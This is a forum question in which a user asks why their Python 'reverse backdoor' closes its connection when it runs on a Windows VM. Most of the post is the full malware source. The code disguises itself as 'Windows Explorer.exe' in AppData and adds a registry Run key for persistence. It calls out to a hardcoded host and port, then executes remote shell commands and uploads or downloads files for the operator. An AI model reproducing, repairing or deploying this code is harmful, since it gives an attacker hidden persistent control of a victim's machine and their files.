# Error during socket connection in local network (python)

Tags: python, sockets, tcp, connection

I'm confused since a few days because I've finished my script in python which is a reverse connection, so for practice I first connected my host machine and my VM Kali and it's working fine, BUT when I'm trying to connect my host machine with my VM Windows, there is a handshake TCP, but at the first command (like "dir" or "pwd"), my Windows VM close the connection.

I really don't know why, I turn off my firewall in Windows, and I don't think it come from the script because it's working fine with Kali.

```
#!/usr/bin/env python
```

import socket
import subprocess
import json
import os
import base64
import sys
import shutil

class Backdoor:

```
def __init__(self, ip, port):
    self.become_persistent()
    self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.connection.connect((ip, port))

def become_persistent(self):
    evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
    if not os.path.exists(evil_file_location):
        shutil.copyfile(sys.executable, evil_file_location)
        subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

def reliable_send(self, data):
    json_data = json.dumps(data)
    self.connection.send(json_data)

def reliable_receive(self):
    json_data = ""
    while True:
        try:
            json_data = json_data + self.connection.recv(1024)
            return json.loads(json_data)
        except ValueError:
            continue

def execute_system_command(self, command):
    return subprocess.check_output(command, shell=True)

def change_working_directory_to(self, path):
    os.chdir(path)
    return "Changing working directory to " + path

def read_file(self, path):
    with open(path, "rb") as file:
        return base64.b64encode(file.read())

def write_file(self, path, content):
    with open(path, "wb") as file:
        file.write(base64.b64decode(content))
        return "[+] Upload successful"


def run(self):
    while True:
        command = self.reliable_receive()

        try:
            if command[0] == "exit":
                self.connection.close()
                exit()
            elif command[0] == "cd" and len(command) > 1:
                command_result = self.change_working_directory_to(command[1])
            elif command[0] == "download":
                command_result = self.read_file(command[1])
            elif command[0] == "upload":
                command_result = self.write_file(command[1], command[2])
            else:
                command_result = self.execute_system_command(command)
        except Exception:
            command_result = "[-] Error during command execution."

        self.reliable_send(command_result)
```

try:
    my_backdoor = Backdoor("192.168.1.20", 4444)
    my_backdoor.run()
except Exception:
    sys.exit()

The script is a reverse backdoor. I run the reverse backdoor in the CMD of windows and I have not an error message when the connection is closed.

I'm lost, I'm searching since a few days, if someone could help me ^^ !